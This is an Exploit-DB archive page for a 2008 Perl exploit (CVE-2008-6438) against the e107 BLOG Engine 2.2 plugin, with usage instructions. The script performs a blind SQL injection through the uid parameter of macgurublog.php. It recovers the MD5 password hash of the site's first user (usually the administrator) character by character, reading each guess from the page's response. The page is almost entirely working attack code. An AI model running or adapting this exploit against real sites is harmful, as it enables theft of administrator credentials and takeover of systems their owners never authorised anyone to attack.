e107 Plugin BLOG Engine 2.2 - Blind SQL Injection

EDB-ID:

6158

CVE:

2008-6438

EDB Verified:

Author:

Virangar Security

Type:

webapps

Exploit:   /  

Platform:

PHP

Date:

2008-07-29

Vulnerable App: 
#!/usr/bin/perl 
#####################################################################################
#         e107 Plugin BLOG Engine v2.2 Blind SQL Injection Exploit                  #
#                           ..::virangar security team::..                          #
#                              www.virangar.net                                     #
#                 C0d3d BY:virangar security team ( hadihadi  )                     #
#special tnx to:                                                                    #
#MR.nosrati,black.shadowes,MR.hesy,Ali007,Zahra                                     #
#& all virangar members & all hackerz                                               #
# my lovely friends hadi_aryaie2004 & arash(imm02tal)                               #
#             ..:::Young Iranina Hackerz::..                                        #
#####################################################################################
#[-] note: becuse e107 using diffrent prefix/table names may it's not work good,but i wrote it for default mod  ;) 
#this code is for english e107's only,if you want work on other languages,you can edit line 67;)

use HTTP::Request;
use LWP::UserAgent;

if (@ARGV != 1){
header();
}

$host = $ARGV[0];

print "\n md5 Password:\r\n";
&halghe();
print "\n[+]Done\n";


sub halghe {
for($i = 1; $i <= 32; $i++){
 $f = 0;
 $n = 48;
 while(!$f && $n <= 57)
 {
  if(&inject($host, $i, $n,)){
 $f = 1;
     syswrite(STDOUT, chr($n), 1);
   }
$n++;
}
if(!$f){ 
$n=97;
while(!$f && $n <= 102)
 {
  if(&inject($host, $i, $n,)){
 $f = 1;
     syswrite(STDOUT, chr($n), 1);
   }
$n++;
}}
}
}
sub inject {
my $site = $_[0];
my $a = $_[1];
my $b = $_[2];

$col = "user_password";

$attack= "$site"."%20and%20substring((select%20"."$col"."%20from%20e107_user%20where%20user_id=1%20limit%200,1),"."$a".",1)=char("."$b".")/*";

$b = LWP::UserAgent->new() or die "Could not initialize browser\n";
$b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');
$req = $b->request(HTTP::Request->new(GET=>$attack));
$res = $req->content;

if ($res !~ /The user has hidden their blog./i){
    return 1;
}

}
sub header {
print qq{
###################################################################
# e107 Plugin BLOG Engine v2.2 Blind SQL Injection Exploit        #
#                  (just for english e107's)                      #
#                      www.virangar.net                           #
#   Useage: perl $0 Host                                          #
#                                                                 #
#   Host: full patch to macgurublog.php+uid (dont forget http://) #
#                                                                 #
#  Example:                                                       #
# perl $0 http://site/macgurublog_menu/macgurublog.php?uid=5      #
#                                                                 #
###################################################################
};
}

# milw0rm.com [2008-07-29]
Tags:
Advisory/Source: Link
Databases Links Sites Solutions
Exploits Search Exploit-DB OffSec Courses and Certifications
Google Hacking Submit Entry Kali Linux Learn Subscriptions
Papers SearchSploit Manual VulnHub OffSec Cyber Range
Shellcodes Exploit Statistics Proving Grounds
Penetration Testing Services
Exploits Google Hacking Papers Shellcodes
Search Exploit-DB Submit Entry SearchSploit Manual Exploit Statistics
OffSec Kali Linux VulnHub
Courses and Certifications Learn Subscriptions OffSec Cyber Range Proving Grounds Penetration Testing Services